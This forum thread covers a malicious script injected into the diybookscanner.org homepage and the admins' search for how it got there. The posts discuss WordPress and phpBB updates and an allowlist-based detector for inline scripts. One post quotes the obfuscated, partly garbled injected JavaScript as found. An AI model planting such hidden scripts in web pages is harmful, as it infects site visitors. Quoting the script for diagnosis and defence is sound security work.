
Virus on Homepage ?

Just what it says.
Hasher
Posts: 77
Joined: 26 Sep 2009, 03:05

Post by Hasher » 22 Dec 2010, 11:12

Am I the only one getting a virus warning on http://diybookscanner.org/ homepage ?


daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States

Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 11:30

Hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>


I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.
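
An insertion like the one quoted in the post above can be caught by hashing every inline script in a served page and comparing it against an allowlist of scripts the site owner actually wrote. This is an added example, not part of the original thread; the sample page, the function names and the allowlist are constructed for illustration.

```python
import hashlib
from html.parser import HTMLParser

class InlineScriptCollector(HTMLParser):
    """Collect (line, body) for every <script> element without a src attribute."""
    def __init__(self):
        super().__init__()
        self.scripts = []   # (start_line, body_text)
        self._buf = None    # list of text chunks while inside an inline script
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._buf, self._line = [], self.getpos()[0]

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._line, "".join(self._buf)))
            self._buf = None

def digest(body):
    # Strip surrounding whitespace so re-indenting a script keeps its hash.
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()

def unexpected_inline_scripts(html_text, allowed_digests):
    """Return [(line, digest, preview)] for inline scripts not on the allowlist."""
    parser = InlineScriptCollector()
    parser.feed(html_text)
    parser.close()
    return [(line, digest(body), body.strip()[:40])
            for line, body in parser.scripts
            if digest(body) not in allowed_digests]

# Constructed sample page: one script the owner wrote, one appended before </body>.
KNOWN_GOOD = "document.title = 'Home';"
SAMPLE_PAGE = """<html><body>
<script>document.title = 'Home';</script>
<script src="/js/lib.js"></script>
<map name="nav"></map>
<!-- marker --><script>var a="";function b(){};</script></body>
</html>"""
ALLOWED = {digest(KNOWN_GOOD)}

if __name__ == "__main__":
    for line, d, preview in unexpected_inline_scripts(SAMPLE_PAGE, ALLOWED):
        print(f"line {line}: unlisted inline script sha256={d[:16]} {preview!r}")
```

Run periodically against the rendered front page, this flags any inline script whose digest is not on the allowlist, whichever route was used to write it to the server.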


Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 11:35

Apparently WordPress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/


Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 12:12

It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.

Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 » 10 Jan 2011, 13:07

You're also a bit behind on WordPress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with phpBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? WordPress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about phpBB3...


Re: Virus on Homepage ?

Post by daniel_reetz » 10 Jan 2011, 15:03

Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for WordPress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.

Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 » 10 Jan 2011, 21:56

I wouldn't rely too much on a hosting panel for this. WordPress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of WordPress and PHP-based system infections being spread via DreamHost specifically. I hope this isn't one of them...


Re: Virus on Homepage ?

Post by daniel_reetz » 10 Jan 2011, 22:28

Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates; I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.

rob
Posts: 773
Joined: 03 Jun 2009, 13:50
E-book readers owned: iRex iLiad, Kindle 2
Number of books owned: 4000
Country: United States
Location: Maryland, United States

Re: Virus on Homepage ?

Post by rob » 10 Jan 2011, 22:58

The Admin Control Panel for the forum has an upgrade button; it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.
The Singularity is Near. ~ http://halfbakedmaker.org ~ Follow me as I build the world's first all-mechanical steam-powered computer.
